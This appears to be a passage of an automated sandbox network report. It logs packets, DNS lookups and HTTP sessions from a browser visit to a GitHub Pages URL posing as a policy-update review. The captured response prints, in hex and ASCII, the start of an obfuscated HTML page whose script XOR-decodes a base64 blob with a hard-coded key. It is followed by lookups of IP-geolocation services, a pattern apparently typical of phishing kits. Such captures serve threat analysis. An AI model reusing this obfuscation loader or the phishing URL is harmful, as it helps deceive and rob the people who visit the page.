                                                                                    Dec 18, 2024 00:29:42.298469067 CET49796443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:29:42.298501015 CET44349796142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:29:42.298962116 CET44349796142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:29:42.309798956 CET49796443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:29:42.309887886 CET44349796142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:29:42.351270914 CET49796443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:29:52.003465891 CET44349796142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:29:52.003626108 CET44349796142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:29:52.003715992 CET49796443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:29:53.795433044 CET49796443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:29:53.795471907 CET44349796142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:40.659600973 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:40.659677029 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:40.659770966 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:40.660073996 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:40.660105944 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:42.357400894 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:42.357882977 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:42.357916117 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:42.359023094 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:42.359416962 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:42.359587908 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:42.405690908 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:52.064971924 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:52.065134048 CET44349931142.250.181.132192.168.2.4
                                                                                    Dec 18, 2024 00:30:52.065227032 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:53.801498890 CET49931443192.168.2.4142.250.181.132
                                                                                    Dec 18, 2024 00:30:53.801518917 CET44349931142.250.181.132192.168.2.4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 18, 2024 00:28:37.058657885 CET5237953192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:37.058769941 CET5353453192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:37.196671009 CET53554431.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:37.229290009 CET53620531.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:37.291395903 CET53523791.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:37.305808067 CET53535341.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:39.065385103 CET5814953192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:39.065517902 CET5998853192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:39.066986084 CET6215653192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:39.067136049 CET5963953192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:39.202038050 CET53599881.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:39.202378988 CET53581491.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:39.773056030 CET53596391.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:39.799388885 CET53621561.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:39.972281933 CET53630621.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:40.535304070 CET6470953192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:40.535474062 CET6461553192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:40.672173023 CET53647091.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:40.673261881 CET53646151.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:40.795367002 CET5958153192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:40.795522928 CET4935453192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:40.899122000 CET5193053192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:40.932351112 CET53595811.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:40.933118105 CET53493541.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:42.099756956 CET5560153192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:42.100258112 CET4920353192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:42.101980925 CET6208153192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:42.102155924 CET6194853192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:42.107095003 CET5434753192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:42.107225895 CET6015553192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:42.238425970 CET53556011.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:42.238866091 CET53492031.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:42.245841026 CET53601551.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:42.246599913 CET53543471.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:42.385164022 CET53619481.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:42.398737907 CET53620811.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:44.247431040 CET6026553192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:44.247572899 CET6544053192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:44.266189098 CET5114553192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:44.266346931 CET5300053192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:44.356900930 CET6511553192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:44.356901884 CET4916453192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:44.384232044 CET53602651.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:44.384676933 CET53654401.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:44.406407118 CET53530001.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:44.410820961 CET53511451.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:44.493887901 CET53491641.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:44.497802973 CET53651151.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:45.251039982 CET6179253192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:45.251367092 CET5925253192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:45.390399933 CET53617921.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:45.390455008 CET53592521.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:46.498328924 CET6043453192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:46.498472929 CET5393553192.168.2.41.1.1.1
                                                                                    Dec 18, 2024 00:28:46.636708975 CET53604341.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:46.637818098 CET53539351.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:28:52.229065895 CET138138192.168.2.4192.168.2.255
                                                                                    Dec 18, 2024 00:28:57.271507978 CET53548131.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:29:16.258799076 CET53652471.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:29:36.103805065 CET53649061.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:29:39.011410952 CET53537321.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:30:09.831096888 CET53581511.1.1.1192.168.2.4
                                                                                    Dec 18, 2024 00:30:54.253165007 CET53562671.1.1.1192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 18, 2024 00:28:37.058657885 CET192.168.2.41.1.1.10xd487Standard query (0)roadmap27.github.ioA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:37.058769941 CET192.168.2.41.1.1.10xd2b3Standard query (0)roadmap27.github.io65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.065385103 CET192.168.2.41.1.1.10x767eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.065517902 CET192.168.2.41.1.1.10x9b8eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.066986084 CET192.168.2.41.1.1.10x8d0dStandard query (0)www.larkus.aoA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.067136049 CET192.168.2.41.1.1.10x157aStandard query (0)www.larkus.ao65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.535304070 CET192.168.2.41.1.1.10xaf5aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.535474062 CET192.168.2.41.1.1.10x19eaStandard query (0)www.google.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.795367002 CET192.168.2.41.1.1.10x1952Standard query (0)roadmap27.github.ioA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.795522928 CET192.168.2.41.1.1.10x74a6Standard query (0)roadmap27.github.io65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.899122000 CET192.168.2.41.1.1.10x8acStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.099756956 CET192.168.2.41.1.1.10x1830Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.100258112 CET192.168.2.41.1.1.10xa3f6Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.101980925 CET192.168.2.41.1.1.10x4547Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.102155924 CET192.168.2.41.1.1.10xd0cStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.107095003 CET192.168.2.41.1.1.10xbe3dStandard query (0)www.larkus.aoA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.107225895 CET192.168.2.41.1.1.10x8c00Standard query (0)www.larkus.ao65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.247431040 CET192.168.2.41.1.1.10x3a80Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.247572899 CET192.168.2.41.1.1.10x3544Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.266189098 CET192.168.2.41.1.1.10x797aStandard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.266346931 CET192.168.2.41.1.1.10x8af2Standard query (0)ipapi.co65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.356900930 CET192.168.2.41.1.1.10xce89Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.356901884 CET192.168.2.41.1.1.10x93a1Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.251039982 CET192.168.2.41.1.1.10x6029Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.251367092 CET192.168.2.41.1.1.10x6c77Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:46.498328924 CET192.168.2.41.1.1.10x4be5Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:46.498472929 CET192.168.2.41.1.1.10x801aStandard query (0)ipapi.co65IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 18, 2024 00:28:37.291395903 CET1.1.1.1192.168.2.40xd487No error (0)roadmap27.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:37.291395903 CET1.1.1.1192.168.2.40xd487No error (0)roadmap27.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:37.291395903 CET1.1.1.1192.168.2.40xd487No error (0)roadmap27.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:37.291395903 CET1.1.1.1192.168.2.40xd487No error (0)roadmap27.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.202038050 CET1.1.1.1192.168.2.40x9b8eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.202378988 CET1.1.1.1192.168.2.40x767eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.202378988 CET1.1.1.1192.168.2.40x767eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.773056030 CET1.1.1.1192.168.2.40x157aNo error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.799388885 CET1.1.1.1192.168.2.40x8d0dNo error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:39.799388885 CET1.1.1.1192.168.2.40x8d0dNo error (0)larkus.ao65.109.232.106A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.672173023 CET1.1.1.1192.168.2.40xaf5aNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.673261881 CET1.1.1.1192.168.2.40x19eaNo error (0)www.google.com65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.932351112 CET1.1.1.1192.168.2.40x1952No error (0)roadmap27.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.932351112 CET1.1.1.1192.168.2.40x1952No error (0)roadmap27.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.932351112 CET1.1.1.1192.168.2.40x1952No error (0)roadmap27.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:40.932351112 CET1.1.1.1192.168.2.40x1952No error (0)roadmap27.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:41.112823963 CET1.1.1.1192.168.2.40x8acNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.238425970 CET1.1.1.1192.168.2.40x1830No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.238425970 CET1.1.1.1192.168.2.40x1830No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.238425970 CET1.1.1.1192.168.2.40x1830No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.238866091 CET1.1.1.1192.168.2.40xa3f6No error (0)api.ipify.org65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.245841026 CET1.1.1.1192.168.2.40x8c00No error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.246599913 CET1.1.1.1192.168.2.40xbe3dNo error (0)www.larkus.aolarkus.aoCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.246599913 CET1.1.1.1192.168.2.40xbe3dNo error (0)larkus.ao65.109.232.106A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.385164022 CET1.1.1.1192.168.2.40xd0cNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.398737907 CET1.1.1.1192.168.2.40x4547No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.398737907 CET1.1.1.1192.168.2.40x4547No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.398737907 CET1.1.1.1192.168.2.40x4547No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.398737907 CET1.1.1.1192.168.2.40x4547No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.398737907 CET1.1.1.1192.168.2.40x4547No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.903656006 CET1.1.1.1192.168.2.40xf630No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:42.903656006 CET1.1.1.1192.168.2.40xf630No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.384232044 CET1.1.1.1192.168.2.40x3a80No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.406407118 CET1.1.1.1192.168.2.40x8af2No error (0)ipapi.co65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.410820961 CET1.1.1.1192.168.2.40x797aNo error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.410820961 CET1.1.1.1192.168.2.40x797aNo error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.410820961 CET1.1.1.1192.168.2.40x797aNo error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.493887901 CET1.1.1.1192.168.2.40x93a1No error (0)api.ipify.org65IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.497802973 CET1.1.1.1192.168.2.40xce89No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.497802973 CET1.1.1.1192.168.2.40xce89No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:44.497802973 CET1.1.1.1192.168.2.40xce89No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.390399933 CET1.1.1.1192.168.2.40x6029No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.390399933 CET1.1.1.1192.168.2.40x6029No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.390399933 CET1.1.1.1192.168.2.40x6029No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.390399933 CET1.1.1.1192.168.2.40x6029No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.390399933 CET1.1.1.1192.168.2.40x6029No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:45.390455008 CET1.1.1.1192.168.2.40x6c77No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:46.636708975 CET1.1.1.1192.168.2.40x4be5No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:46.636708975 CET1.1.1.1192.168.2.40x4be5No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:46.636708975 CET1.1.1.1192.168.2.40x4be5No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 00:28:46.637818098 CET1.1.1.1192.168.2.40x801aNo error (0)ipapi.co65IN (0x0001)false
                                                                                    • roadmap27.github.io
                                                                                    • https:
                                                                                      • cdnjs.cloudflare.com
                                                                                      • www.larkus.ao
                                                                                      • api.ipify.org
                                                                                      • logo.clearbit.com
                                                                                      • ipapi.co
                                                                                    • a.nel.cloudflare.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449739185.199.108.1534438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:38 UTC720OUTGET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/ HTTP/1.1
                                                                                    Host: roadmap27.github.io
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:38 UTC731INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 3146
                                                                                    Server: GitHub.com
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    permissions-policy: interest-cohort=()
                                                                                    Last-Modified: Tue, 17 Dec 2024 19:16:51 GMT
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                    ETag: "6761ce23-c4a"
                                                                                    expires: Tue, 17 Dec 2024 23:38:38 GMT
                                                                                    Cache-Control: max-age=600
                                                                                    x-proxy-cache: MISS
                                                                                    X-GitHub-Request-Id: AEB9:F8CE3:D21048:E7F2FD:67620926
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Date: Tue, 17 Dec 2024 23:28:38 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-ewr-kewr1740026-EWR
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1734478119.802895,VS0,VE31
                                                                                    Vary: Accept-Encoding
                                                                                    X-Fastly-Request-ID: 71dad0b05454e5f04bb51c0c4448ceb719a04967
                                                                                    2024-12-17 23:28:38 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 62 66 75 73 63 61 74 65 64 20 48 54 4d 4c 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6e 63 6f 64 65 64 48 74 6d 6c 20 3d 20 22 54 30 51 6e 50 53 59 67 4d 6a 55 38 55 77 30 58 48 77 6c 4b 59 56 6b 52 42 77 67 50 55 67 6b 56 42 51 4a 45 55 51 41 4e 55 46 74 2b 56 77 30 63 45 67 46 64 65 45 56 55 53 30 56 46 48 67 41 58 45 30 55 58 41 77 51 4c 41 41 41 58 54 30 63 68 50 79 4e 55 53 30 64 64 65 45 56 55 53 30 56 46 48 67 41 58 45 30 55 61
                                                                                    Data Ascii: <!DOCTYPE html><html><head> <title>Obfuscated HTML</title></head><body> <script> var key = "secretkey"; var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEVUS0VFHgAXE0UXAwQLAAAXT0chPyNUS0ddeEVUS0VFHgAXE0Ua
                                                                                    2024-12-17 23:28:38 UTC1378INData Raw: 44 55 6b 56 49 41 6b 55 61 48 77 51 51 41 56 68 57 44 51 51 4b 55 77 4d 43 58 77 51 47 47 51 6f 4f 58 68 63 4b 46 51 30 41 53 56 74 46 58 41 78 64 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 56 30 6f 64 47 68 4e 64 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 56 77 45 51 42 55 55 41 48 67 51 48 47 46 68 62 41 41 6b 4b 46 67 41 47 52 68 45 63 43 78 46 42 54 44 59 59 41 67 45 63 55 78 45 4d 55 68 4d 52 47 51 77 66 43 6c 6c 4d 46 67 77 43 56 57 39 5a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 56 30 6f 64 47 68 4e 64 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 66 46 67 77 43 53 77 59 56 45 68 59 51 54 30 63 48 42 77 77 64 46 68 64 4f 47 67
                                                                                    Data Ascii: DUkVIAkUaHwQQAVhWDQQKUwMCXwQGGQoOXhcKFQ0ASVtFXAxdeEVUS0VZU0VDUkVUS0VZU0VDUkVUV0odGhNdeEVUS0VZU0VDUkVUS0VZU0VDUkVUVwEQBUUAHgQHGFhbAAkKFgAGRhEcCxFBTDYYAgEcUxEMUhMRGQwfCllMFgwCVW9ZU0VDUkVUS0VZU0VDUkVUV0odGhNdeEVUS0VZU0VDUkVUS0VZU0VfFgwCSwYVEhYQT0cHBwwdFhdOGg
                                                                                    2024-12-17 23:28:38 UTC390INData Raw: 41 45 4b 42 46 74 2b 53 30 56 5a 55 30 56 44 55 6b 56 49 52 41 45 51 42 56 74 70 55 6b 56 55 53 31 6c 57 46 77 77 56 54 47 39 2b 53 30 56 5a 55 31 6b 51 45 52 63 64 47 78 46 5a 41 42 63 41 54 30 63 63 48 78 45 4a 41 46 39 4d 58 52 49 44 48 45 73 56 45 68 63 49 42 78 5a 61 43 67 70 57 45 67 73 4b 48 77 51 59 52 42 59 61 41 51 77 54 42 6b 73 65 47 45 64 48 54 30 6f 51 45 52 63 64 47 78 46 48 65 56 6c 4d 45 41 6f 51 45 6c 74 7a 54 30 6f 4c 42 67 67 59 56 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 72 79 70 74 65 64 48 74 6d 6c 20 3d 20 61 74 6f 62 28 65 6e 63 6f 64 65 64 48 74 6d 6c 29 2e 73 70 6c 69 74 28 22 22 29 2e 6d 61 70 28 28 63 2c 20 69 29 20 3d 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61
                                                                                    Data Ascii: AEKBFt+S0VZU0VDUkVIRAEQBVtpUkVUS1lWFwwVTG9+S0VZU1kQERcdGxFZABcAT0ccHxEJAF9MXRIDHEsVEhcIBxZaCgpWEgsKHwQYRBYaAQwTBkseGEdHT0oQERcdGxFHeVlMEAoQEltzT0oLBggYVQ=="; var decryptedHtml = atob(encodedHtml).split("").map((c, i) => String.fromCha


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449740185.199.108.1534438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:39 UTC662OUTGET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/style.css HTTP/1.1
                                                                                    Host: roadmap27.github.io
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: text/css,*/*;q=0.1
                                                                                    Sec-Fetch-Site: same-origin
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: style
                                                                                    Referer: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:39 UTC753INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 4302
